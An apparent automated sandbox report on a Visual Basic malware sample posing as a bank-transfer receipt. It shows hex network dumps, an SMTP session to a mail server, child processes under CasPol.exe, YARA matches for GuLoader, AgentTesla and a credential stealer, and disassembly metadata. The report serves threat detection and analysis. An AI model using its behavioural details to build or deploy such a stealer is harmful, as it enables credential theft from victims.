2021-11-22 13:07:59 UTC	218	IN	Data Raw: 1f d7 9d e0 04 f6 c4 68 b0 b1 60 11 c4 a8 01 dd bd e5 c0 0e 5d b5 65 99 b3 02 8e f0 5f 18 3d c2 ab 64 59 91 1a e9 1d c4 81 dd 1d fa 48 d7 ab fc 55 11 92 f4 eb 0f c8 46 c7 17 2b 40 d0 0a 29 28 75 1c a6 db d6 43 63 ba e5 0b 56 32 1a f8 df 68 6e ba 73 c2 88 91 f3 24 31 9f 04 3a 23 e9 dc f5 23 37 f6 58 dc c8 f5 7f ea 43 2a 45 03 68 94 f3 5e 19 f5 96 e2 2f aa bf 42 6f 55 ab 50 70 07 61 8f 5c b3 bb e1 14 d7 45 30 7c b2 cf 7f 6b c2 72 98 55 4d b8 cf 4b bc 0c 1a 99 e0 fe 00 f8 e2 f8 4c e3 21 11 c0 6f 2a 69 37 8d a3 84 a4 ef 89 96 02 91 6a a8 d3 42 b9 41 b1 ee ea 81 f7 4d f8 60 6c 89 64 17 44 6f 72 6c 9f b6 ab 73 15 c7 e1 33 0b 57 00 f0 91 dc 70 1d 47 11 f2 5f fc e3 98 44 ae 12 e9 f1 3e 6e a1 23 fb 41 a9 74 e3 97 25 46 6b 3e a6 17 ef 89 a5 c5 a4 d3 04 25 1d e6 d6 Data Ascii: h`]e_=dYHUF+@)(uCcV2hns$1:##7XCEh^/BoUPpa\E0\|krUMKL!oi7jBAM`ldDorls3WpG_D>n#At%Fk>%
2021-11-22 13:07:59 UTC	219	IN	Data Raw: ba fa b8 3f b8 bd 40 e0 4d 1e 0e 48 9f 4e e4 e5 f4 ea 7c 55 4f 9a c6 d7 45 df d8 61 a8 51 b6 e5 86 4a 41 c7 f7 36 60 dc 63 c2 3b e6 8a fe 79 31 33 49 0a 2c 2f 64 2c 93 55 9e 2c 00 c9 d4 09 65 66 ee 42 4d 9d d6 24 dc 41 15 5d a9 93 7f d4 91 1e d0 ce a8 ac 8b db d9 41 e1 e5 5e 1b 4c 9d f5 d8 f9 55 ac 85 8f 6d 7b 12 2e 35 07 f7 95 b7 9d 06 2e 0e 8c a2 51 7f f7 44 62 3f cc 36 14 ac 6e b6 bb 94 de 2e 53 a6 4c 1f 79 cc 44 3c 4c 65 85 14 84 9a 83 e0 f8 df 7c 04 8f 53 06 21 7f 84 26 24 a7 32 25 cf a3 3b 82 a9 11 4f 6c 43 c7 9e 66 52 64 b7 4e 4c b8 85 aa ad 55 a8 32 a1 e5 19 36 b6 bd d2 79 75 9e a7 81 14 17 f9 65 ca 95 93 2b c2 46 d1 d3 db fb e7 90 37 7b 14 11 39 28 ed f7 33 ab 5e 31 ec 51 32 09 6c af d7 cc d7 5c 4e de 5c 66 67 1e 2c 67 a0 00 da 5c 1c a3 2f c9 19 Data Ascii: ?@MHN\|UOEaQJA6`c;y13I,/d,U,efBM$A]A^LUm{.5.QDb?6n.SLyD<Le\|S!&$2%;OlCfRdNLU26yue+F7{9(3^1Q2l\N\fg,g\/
2021-11-22 13:07:59 UTC	220	IN	Data Raw: 60 9a ee 50 17 fb 95 ea 32 a4 b7 5f 61 5c 8b 54 71 16 e1 67 52 bd b5 e9 13 d1 4c 39 74 b8 c7 77 43 c5 60 90 40 5f 39 56 4a ae 8c f6 8c f2 7f 99 f9 f0 78 a0 e4 2b 18 d2 ee 5f 6b 30 8a a9 8d ad e8 80 87 83 a8 63 ba 53 ae bf 41 b3 e9 f7 84 ff 47 d8 60 79 9b e5 8e 45 7d f2 80 93 b1 ac 71 1b c5 fd 2e 17 4a 1c ed 93 db 70 1f 46 1f e3 de c5 e4 b8 46 ac 00 69 1d 30 67 81 21 f9 53 29 98 f1 17 f0 4a 6c 38 b9 12 f5 8b b7 45 51 ce 01 ad 02 c6 d4 0d 2e 59 12 89 05 1a d0 bf f6 0e 04 78 22 83 b4 c5 14 47 3a 2f 98 b8 cb 44 63 8d 06 ef 3b 6c e5 e4 a3 d6 82 fc 5b 6f a9 70 2c 9a 81 4a 0f 39 f9 8a 4c 18 fe a0 d4 e3 a1 5e 25 a1 63 71 91 81 04 5a 3d 82 a8 03 62 e1 e4 18 e1 94 35 da 62 93 b7 24 96 80 b4 28 a7 11 4e 88 36 7b 54 78 62 74 24 f8 cc 35 9a 33 85 43 f3 b3 4f e8 2e 22 Data Ascii: `P2_a\TqgRL9twC`@_9VJx+_k0cSAG`yE}q.JpFFi0g!S)Jl8EQ.Yx"G:/Dc;l[op,J9L^%cqZ=b5b$(N6{Txbt$53CO."
2021-11-22 13:07:59 UTC	221	IN	Data Raw: f5 dc fd 62 19 2b eb d9 05 14 9c 2e 01 52 b6 17 3e d8 0f fd c8 f6 b9 43 20 8b 70 79 06 a0 31 79 6c 57 be 11 80 b6 d0 c0 b0 ff 3d 38 95 21 52 50 38 e1 43 57 cc 4b 70 a0 cf 51 f7 cd 7c 35 15 2d e5 8e 6e 7a 4c 8b 73 6c 9f f2 cf cf 25 c6 5e f5 9d 3a 3e be 8d f5 4d 46 f7 d0 e9 7b 7e ac 16 b0 e7 b1 3b cd 72 fa b4 ba 0c 83 f8 55 17 7f ab 35 24 ea f5 2e ae 4c 58 e6 71 31 14 69 b2 d2 d1 d2 41 4b d4 5b 60 7a 1b 31 62 ae 08 d2 54 16 a3 2c cc 17 4d 27 08 1f 93 ca 80 34 ab b8 79 5a b4 a5 72 07 a1 4d 41 2d 9a 86 52 9f 5d b8 20 96 72 f8 ba d1 5e b6 39 b1 9f a8 e9 68 c0 11 3a ef 7b 3d aa 8f 46 fb 2b 20 4d e4 7c 13 81 bf 77 ee af de d4 49 6b c0 26 4e a5 99 78 06 46 ba 5f d4 96 8e c1 68 0d 7d 28 38 0c e6 b4 3c b1 0b 66 26 a4 8c ce 70 a8 20 5d 77 e6 a2 8b e5 d7 3b d4 1d d8 Data Ascii: b+.R>C py1ylW=8!RP8CWKpQ\|5-nzLsl%^:>MF{~;rU5$.LXq1iAK[`z1bT,M'4yZrMA-R] r^9h:{=F+ M\|wIk&NxF_h}(8<f&p ]w;

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 22, 2021 14:09:34.936005116 CET	587	49775	54.36.109.179	192.168.11.20	220-server.enfoque-ti.com ESMTP Exim 4.94.2 #2 Mon, 22 Nov 2021 14:09:34 +0100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 22, 2021 14:09:34.936625004 CET	49775	587	192.168.11.20	54.36.109.179	EHLO 061544
Nov 22, 2021 14:09:34.947549105 CET	587	49775	54.36.109.179	192.168.11.20	250-server.enfoque-ti.com Hello 061544 [102.129.143.99] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPE_CONNECT 250-STARTTLS 250 HELP
Nov 22, 2021 14:09:34.947845936 CET	49775	587	192.168.11.20	54.36.109.179	STARTTLS
Nov 22, 2021 14:09:34.961469889 CET	587	49775	54.36.109.179	192.168.11.20	220 TLS go ahead

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: justificante de la transfer.exe PID: 6424 Parent PID: 8792

General

Start time:	14:07:29
Start date:	22/11/2021
Path:	C:\Users\user\Desktop\justificante de la transfer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\justificante de la transfer.exe"
Imagebase:	0x400000
File size:	286720 bytes
MD5 hash:	E565201AC69A8A2FA7EE22E0809F7B3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.933649087.0000000002300000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: CasPol.exe PID: 6828 Parent PID: 6424

General

Start time:	14:07:43
Start date:	22/11/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\justificante de la transfer.exe"
Imagebase:	0x170000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: CasPol.exe PID: 8676 Parent PID: 6424

General

Start time:	14:07:43
Start date:	22/11/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\justificante de la transfer.exe"
Imagebase:	0x6a0000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000000.761549812.0000000000B00000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 8684 Parent PID: 8676

General

Start time:	14:07:44
Start date:	22/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff773e50000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: justificante de la transfer.exe PID: 6424 Parent PID: 8792 justificante de la transfer.exeCOMMON

Executed Functions

Function 004013FC, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

#100.MSVBVM60(004152B8), ref: 00401401

Strings

ID.$, xrefs: 00401418

Memory Dump Source

Source File: 00000000.00000002.932246567.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.932222467.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.932565706.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.932586587.0000000000445000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: ID.$
API String ID: 1341478452-2278490186
Opcode ID: 62704888449ad2e6ccae4c2d1de487ecbbd86283e778afc8b47cbece0b921617
Instruction ID: 53a369cfb81c2b1f01367d1b48c4f2c2bdd7e96e06fab5a3e660ccb736a351fe
Opcode Fuzzy Hash: 62704888449ad2e6ccae4c2d1de487ecbbd86283e778afc8b47cbece0b921617
Instruction Fuzzy Hash: 3E51FB6254E7C16FE3039B348C6A2913FB19E6322871E45EBC4C1CF0B3E1191C0AD766

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 023064CB, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.933649087.0000000002300000.00000040.00000001.sdmp, Offset: 02300000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0100846d9987330969f9578d8dbe56a9cf80575aec0cd4b53eecc90515fe71c7
Instruction ID: 96279c7e0716039c66a32fceef2c5cd30123ad5e529a05a64bb8cfa8f7b2353d
Opcode Fuzzy Hash: 0100846d9987330969f9578d8dbe56a9cf80575aec0cd4b53eecc90515fe71c7
Instruction Fuzzy Hash: D0A022A222A2808EC303AF38E8800033FB008A323032003E2C030CF0F3E2200B80F30A

Uniqueness

Uniqueness Score: -1.00%

Function 0044230F, Relevance: 88.0, APIs: 45, Strings: 5, Instructions: 464COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401216), ref: 0044232C
#677.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0044237B
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 00442380
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 004423BC
#648.MSVBVM60(0000000A), ref: 004423E5
__vbaFreeVar.MSVBVM60(0000000A), ref: 004423F1
#703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,0000000A), ref: 00442410
__vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,0000000A), ref: 0044241A
__vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE,0000000A), ref: 00442422
__vbaNew2.MSVBVM60(00417DC4,0044463C,00000002,000000FF,000000FE,000000FE,000000FE,0000000A), ref: 0044243A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00417DB4,00000014), ref: 0044249C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00417DD4,00000068), ref: 004424F5
__vbaFreeObj.MSVBVM60(00000000,?,00417DD4,00000068), ref: 00442517
__vbaNew2.MSVBVM60(00417DC4,0044463C), ref: 0044252F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00417DB4,00000014), ref: 00442591
__vbaHresultCheckObj.MSVBVM60(00000000,?,00417DD4,000000E0), ref: 004425ED
__vbaStrMove.MSVBVM60(00000000,?,00417DD4,000000E0), ref: 00442617
__vbaFreeObj.MSVBVM60(00000000,?,00417DD4,000000E0), ref: 0044261F
__vbaNew2.MSVBVM60(00415590,00444010), ref: 00442637
__vbaObjSet.MSVBVM60(?,00000000), ref: 00442670
__vbaHresultCheckObj.MSVBVM60(00000000,?,00417DE4,00000130), ref: 004426BA
__vbaLateIdCallLd.MSVBVM60(00000002,?,00000000,00000000), ref: 004426D9
__vbaNew2.MSVBVM60(00417DC4,0044463C), ref: 004426F4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00417DB4,00000014), ref: 00442756
__vbaStrVarMove.MSVBVM60(?,00000001), ref: 00442779
__vbaStrMove.MSVBVM60(?,00000001), ref: 00442783
__vbaHresultCheckObj.MSVBVM60(00000000,?,00417DD4,00000138), ref: 004427C4
__vbaFreeStr.MSVBVM60(00000000,?,00417DD4,00000138), ref: 004427DB
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004427EE
__vbaFreeVar.MSVBVM60 ref: 004427F9
#680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 0044284D
__vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00442863
__vbaNew2.MSVBVM60(00417DC4,0044463C), ref: 0044287E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00417DB4,00000014), ref: 004428E0
__vbaHresultCheckObj.MSVBVM60(00000000,?,00417DD4,000000D8), ref: 0044293C
__vbaStrMove.MSVBVM60(00000000,?,00417DD4,000000D8), ref: 00442966
__vbaFreeObj.MSVBVM60(00000000,?,00417DD4,000000D8), ref: 0044296E
__vbaNew2.MSVBVM60(00417DC4,0044463C), ref: 00442986
__vbaHresultCheckObj.MSVBVM60(00000000,?,00417DB4,0000004C), ref: 004429E8
__vbaChkstk.MSVBVM60(00000000,?,00417DB4,0000004C), ref: 00442A13
__vbaHresultCheckObj.MSVBVM60(00000000,?,00418D04,0000002C), ref: 00442A56
__vbaFreeObj.MSVBVM60(00000000,?,00418D04,0000002C), ref: 00442A6D
__vbaFreeStr.MSVBVM60(00442AC8), ref: 00442AB2
__vbaFreeStr.MSVBVM60(00442AC8), ref: 00442ABA
__vbaFreeStr.MSVBVM60(00442AC8), ref: 00442AC2

Strings

<FD, xrefs: 0044270F
<FD, xrefs: 0044254A
<FD, xrefs: 004429A1
<FD, xrefs: 00442899
<FD, xrefs: 00442455

Memory Dump Source

Source File: 00000000.00000002.932246567.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.932222467.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.932565706.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.932586587.0000000000445000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$Move$List$Chkstk$#648#677#680#703CallLate
String ID: <FD$<FD$<FD$<FD$<FD
API String ID: 1455495044-2164818728
Opcode ID: 2552c94ac0372d298668202701a339bfaace4d3862327fbdd55024a42727f6e4
Instruction ID: bf3f7d8dec92b1b6913e9188d507462cdc457200ca4cc4c5216268ffaf51d86c
Opcode Fuzzy Hash: 2552c94ac0372d298668202701a339bfaace4d3862327fbdd55024a42727f6e4
Instruction Fuzzy Hash: E12206B1900228EFEB20DF91CD45BDDB7B5BF05304F1081EAF549B62A1DBB85A858F19

Uniqueness

Uniqueness Score: -1.00%

Function 0044212D, Relevance: 24.1, APIs: 16, Instructions: 126COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401216), ref: 00442148
__vbaStrCopy.MSVBVM60(?,?,?,?,00401216), ref: 00442160
__vbaNew2.MSVBVM60(00415590,00444010,?,?,?,?,00401216), ref: 00442178
__vbaObjSet.MSVBVM60(?,00000000), ref: 004421A5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00417DE4,000001AC), ref: 004421D6
__vbaFreeObj.MSVBVM60(00000000,?,00417DE4,000001AC), ref: 004421E7
#613.MSVBVM60(?,00000002), ref: 00442202
__vbaStrVarMove.MSVBVM60(?,?,00000002), ref: 0044220B
__vbaStrMove.MSVBVM60(?,?,00000002), ref: 00442215
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,00000002), ref: 00442224
__vbaNew2.MSVBVM60(00415590,00444010), ref: 0044223F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0044226C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00417DE4,000000D0), ref: 004422A1
__vbaFreeObj.MSVBVM60(00000000,?,00417DE4,000000D0), ref: 004422BA
__vbaFreeStr.MSVBVM60(004422F2), ref: 004422E4
__vbaFreeStr.MSVBVM60(004422F2), ref: 004422EC

Memory Dump Source

Source File: 00000000.00000002.932246567.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.932222467.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.932565706.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.932586587.0000000000445000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMoveNew2$#613ChkstkCopyList
String ID:
API String ID: 1093097441-0
Opcode ID: 29ecd422d2d99734bc5c9f64671b63ed07c34aa743e78397b641413feb4cc4b6
Instruction ID: 13d90ab24ceda039fbf87f31e8e09e163588efdb3fa6cd17e6695b9accc01b97
Opcode Fuzzy Hash: 29ecd422d2d99734bc5c9f64671b63ed07c34aa743e78397b641413feb4cc4b6
Instruction Fuzzy Hash: 46510770D00218AFEB00DFD1C946BEDB7B8BF49304F50446AF501BB6A1DBB95945DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00441ED0, Relevance: 21.2, APIs: 14, Instructions: 161COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401216), ref: 00441EEC
__vbaNew2.MSVBVM60(00415590,00444010,?,?,?,?,00401216), ref: 00441F23
__vbaObjSet.MSVBVM60(?,00000000), ref: 00441F50
__vbaHresultCheckObj.MSVBVM60(00000000,?,00417DE4,000001BC), ref: 00441F81
__vbaFreeObj.MSVBVM60 ref: 00441F92
__vbaHresultCheckObj.MSVBVM60(00000000,004011B8,004177B8,0000008C), ref: 00441FCA
__vbaNew2.MSVBVM60(00415590,00444010), ref: 00441FEB
__vbaObjSet.MSVBVM60(?,00000000), ref: 00442018
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00417DE4,000001A8), ref: 00442049
__vbaFreeObj.MSVBVM60 ref: 0044205A
__vbaNew2.MSVBVM60(00415590,00444010), ref: 00442072
__vbaObjSet.MSVBVM60(?,00000000), ref: 0044209F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00417DE4,00000178), ref: 004420D4
__vbaFreeObj.MSVBVM60 ref: 004420ED

Memory Dump Source

Source File: 00000000.00000002.932246567.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.932222467.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.932565706.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.932586587.0000000000445000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2$Chkstk
String ID:
API String ID: 2989710064-0
Opcode ID: 18cda3402241648f80d23a7b8f50025620869ee47adb25fd2d44b62247acb786
Instruction ID: 619df3b2086bd2d1600e7eb3b375d79f2e2dab6e628e16cf111393784c92491c
Opcode Fuzzy Hash: 18cda3402241648f80d23a7b8f50025620869ee47adb25fd2d44b62247acb786
Instruction Fuzzy Hash: EF610974900208EFEB10DF90D949BEDBBF5BF48305F20446AF501BB6A0CB7A5995DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00441CEA, Relevance: 19.6, APIs: 13, Instructions: 133COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401216), ref: 00441D05
__vbaNew2.MSVBVM60(00415590,00444010,?,?,?,?,00401216), ref: 00441D2A
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,00401216), ref: 00441D57
__vbaHresultCheckObj.MSVBVM60(00000000,?,00417DE4,000001BC,?,?,?,?,?,?,00401216), ref: 00441D88
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,00401216), ref: 00441D99
__vbaNew2.MSVBVM60(00415590,00444010,?,?,?,?,?,?,00401216), ref: 00441DB1
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00401216), ref: 00441DDE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00417DE4,000001A8,?,?,?,?,?,?,?,?,00401216), ref: 00441E0F
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00401216), ref: 00441E20
__vbaNew2.MSVBVM60(00415590,00444010,?,?,?,?,?,?,?,?,00401216), ref: 00441E38
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,00401216), ref: 00441E65
__vbaHresultCheckObj.MSVBVM60(00000000,?,00417DE4,000001AC,?,?,?,?,?,?,?,?,?,?,00401216), ref: 00441E96
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401216), ref: 00441EA7

Memory Dump Source

Source File: 00000000.00000002.932246567.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.932222467.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.932565706.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.932586587.0000000000445000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresultNew2$Chkstk
String ID:
API String ID: 3581712425-0
Opcode ID: 19a9fbb3e161f4b0099d781cf1729611180983a91655fb80310a3b122b1d5377
Instruction ID: a6aa98b4f13efd412f1798e44767c1c0abc34628462bc6605bb6be43f40289ec
Opcode Fuzzy Hash: 19a9fbb3e161f4b0099d781cf1729611180983a91655fb80310a3b122b1d5377
Instruction Fuzzy Hash: 845109B4D00209EFEB00DF91D84ABEEBBB5BF49305F20446AE501B76A0C7791991DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00442ADB, Relevance: 19.6, APIs: 13, Instructions: 100COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401216), ref: 00442AF6
__vbaVarMove.MSVBVM60(?,00000002,0038A795), ref: 00442B35
__vbaVarMove.MSVBVM60(?,00000002,0038A795), ref: 00442B4E
__vbaVarMove.MSVBVM60(?,00000002,0038A795), ref: 00442B67
__vbaVarMove.MSVBVM60(?,00000002,0038A795), ref: 00442B80
__vbaVarMove.MSVBVM60(?,00000002,0038A795), ref: 00442B99
__vbaVarMove.MSVBVM60(?,00000002,0038A795), ref: 00442BB2
__vbaVarMove.MSVBVM60(?,00000002,0038A795), ref: 00442BCB
__vbaVarMove.MSVBVM60(?,00000002,0038A795), ref: 00442BE4
__vbaVarMove.MSVBVM60(?,00000002,0038A795), ref: 00442BFD
#595.MSVBVM60(?,00000000,0000000A,0000000A,0000000A,?,00000002,0038A795), ref: 00442C3E
__vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,00000000,0000000A,0000000A,0000000A,?,00000002,0038A795), ref: 00442C51
__vbaFreeVar.MSVBVM60(00442C80), ref: 00442C7A

Memory Dump Source

Source File: 00000000.00000002.932246567.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.932222467.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.932565706.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.932586587.0000000000445000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Free$#595ChkstkList
String ID:
API String ID: 3203110844-0
Opcode ID: 93b193c118a40f73cfd5d750192bc47cace3b102f1343e35c35ab4a605442f37
Instruction ID: c4549f8e4bb98d00638d6471c3f782834e69a9dca5c98400b2279266a9d2df6a
Opcode Fuzzy Hash: 93b193c118a40f73cfd5d750192bc47cace3b102f1343e35c35ab4a605442f37
Instruction Fuzzy Hash: 1741A0B18102AE9BEF01EFC0C999BDDBBB9FF54304F50015AE4057B1A5D7B82A09CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0B4, Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401216), ref: 0041A0D0
__vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,?,00401216), ref: 0041A0FF
__vbaStrToAnsi.MSVBVM60(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00401216), ref: 0041A114
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,00401216), ref: 0041A125
__vbaStrToUnicode.MSVBVM60(?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?,?), ref: 0041A130
__vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?,?), ref: 0041A13C
__vbaFreeStrList.MSVBVM60(00000002,00000000,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?), ref: 0041A151
__vbaFreeStr.MSVBVM60(0041A17C,?,?,00401216), ref: 0041A176

Memory Dump Source

Source File: 00000000.00000002.932246567.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.932222467.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.932565706.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.932586587.0000000000445000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$AnsiFreeUnicode$ChkstkErrorListSystem
String ID:
API String ID: 3908248399-0
Opcode ID: 6c5a68d394d96a16c61150f34c05bc0737732bdf6cf8bc8ad76b9b6043de427b
Instruction ID: 4dd943446bf7c0f985604d7b1edf6a77db17a805cc37133a011fe8edcc2d2e0d
Opcode Fuzzy Hash: 6c5a68d394d96a16c61150f34c05bc0737732bdf6cf8bc8ad76b9b6043de427b
Instruction Fuzzy Hash: 7211A47190020DBBDF01EFD1E946EDEBBB9AF08704F00406AF900B65A1D779A9548B99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exe PID: 8676 Parent PID: 6424 CasPol.exeCOMMON

Executed Functions

Function 00A004A0, Relevance: 5.4, Strings: 4, Instructions: 434COMMON

Download Yara Rule

Strings

\, xrefs: 00A004D9
\, xrefs: 00A00593
\, xrefs: 00A005CE
<), xrefs: 00A0087E

Memory Dump Source

Source File: 0000000B.00000002.5668408707.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Similarity

API ID:
String ID: <)$\$\$\
API String ID: 0-3914961490
Opcode ID: f164b50995556cb46faa3e0b0133894351bacd7d52a6be15e0e6664297126e76
Instruction ID: 4618a89d54dafc46f0418ccd1945c3d4427e3a29c39be0cb9202efc005d9cb67
Opcode Fuzzy Hash: f164b50995556cb46faa3e0b0133894351bacd7d52a6be15e0e6664297126e76
Instruction Fuzzy Hash: 22E1E231B002189BDB14DB78D954B6E76F6AFC4745F158829EA06EB3C0EF75EC018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E24738, Relevance: 4.2, Strings: 1, Instructions: 2906COMMON

Download Yara Rule

Strings

Kb, xrefs: 00E24744, 00E247FD

Memory Dump Source

Source File: 0000000B.00000002.5672690677.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false

Similarity

API ID:
String ID: Kb
API String ID: 0-203246358
Opcode ID: f11ed05b450540b77a2fe063d01a631cd28944ecc5c897a4bf09b49a6ab47870
Instruction ID: 7b0904dcceeed052d4fcc7a480f27d4775752f1757a684bdfa8e047ac9898ec0
Opcode Fuzzy Hash: f11ed05b450540b77a2fe063d01a631cd28944ecc5c897a4bf09b49a6ab47870
Instruction Fuzzy Hash: C5630C31D10B1A8EDB11EF68C944A99F7B1FF99304F11D69AE45877221EB70AAC4CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00E25072, Relevance: 2.4, Instructions: 2376COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672690677.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
